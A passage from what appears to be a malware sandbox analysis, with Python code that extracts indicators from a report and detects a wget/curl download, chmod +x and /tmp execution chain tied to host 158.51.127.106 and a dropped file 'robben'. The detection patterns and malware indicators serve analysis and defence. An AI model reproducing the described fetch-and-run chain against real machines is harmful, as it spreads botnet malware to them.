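| US | 1.1.1.1:53 | 0.debian.pool.ntp.org | udp |
"""

DOWNLOADERS = {"wget", "curl"}
# Plain-HTTP(S) URL whose host is a bare IPv4 address: no DNS, no TLS pinning.
BARE_IP_URL = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?(/\S*)?")


def parse_processes(text):
    """Pair each executable path with the bracketed command line after it."""
    procs, exe = [], None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]") and exe:
            procs.append((exe, line[1:-1].split()))
            exe = None
        else:
            exe = line
    return procs


def analyse(procs):
    """Extract IOCs and decide whether the download -> chmod -> exec chain is present."""
    urls, hosts, arches, chmod_targets, executed = [], set(), [], set(), []
    for exe, argv in procs:
        name = exe.rsplit("/", 1)[-1]
        if name in DOWNLOADERS:
            for arg in argv[1:]:
                m = BARE_IP_URL.match(arg)
                if m:
                    urls.append(arg)
                    hosts.add(m.group(1))
                    # Last path element names the target architecture (x86_64, mips, ...).
                    arches.append(urlparse(arg).path.rsplit("/", 1)[-1])
        elif name == "chmod" and "+x" in argv:
            chmod_targets.update(a for a in argv[1:] if not a.startswith(("+", "-")))
        elif exe.startswith("/tmp/") and argv and argv[0].startswith("./"):
            executed.append((exe, argv))
    dropped = {e.rsplit("/", 1)[-1] for e, _ in executed}
    # Chain fires when a bare-IP download is followed by chmod +x of a name
    # that is then executed from /tmp.
    chain = bool(urls) and bool(dropped & chmod_targets)
    return {
        "hosts": sorted(hosts),
        "urls": sorted(set(urls)),
        "arches": sorted(set(arches)),
        "dropped": sorted(dropped),
        "exec_count": len(executed),
        "is_downloader_chain": chain,
    }


def network_destinations(text):
    """Parse Network table rows into (ip, port, proto); proto is taken as the
    last non-empty cell so rows with the proto shifted one column still parse."""
    out = set()
    for line in text.strip().splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) >= 3 and ":" in cells[1]:
            ip, port = cells[1].rsplit(":", 1)
            proto = next(c for c in reversed(cells) if c)
            out.add((ip, int(port), proto))
    return out


def corroborate(iocs, destinations):
    """True when every download host from the process list also shows up as a
    network destination, which ties the two report sections together."""
    seen = {ip for ip, _, _ in destinations}
    return bool(iocs["hosts"]) and all(h in seen for h in iocs["hosts"])


if __name__ == "__main__":
    result = analyse(parse_processes(REPORT_LINES))
    print(result, corroborate(result, network_destinations(NETWORK_ROWS)))
```

Run against the full eleven-iteration list, the same code yields the complete architecture set (x86_64, mips, mipsel, arm, arm5, arm6, arm7, spc, sh4, i586, i686) and the single host 158.51.127.106; the repeated `./robben Payload` executions are what the sandbox reports as eleven "Executes dropped EXE" hits, since each architecture's binary is written over the same /tmp/robben and only the one matching the VM's CPU actually runs.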
Network
| Country | Destination | Domain | Proto |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |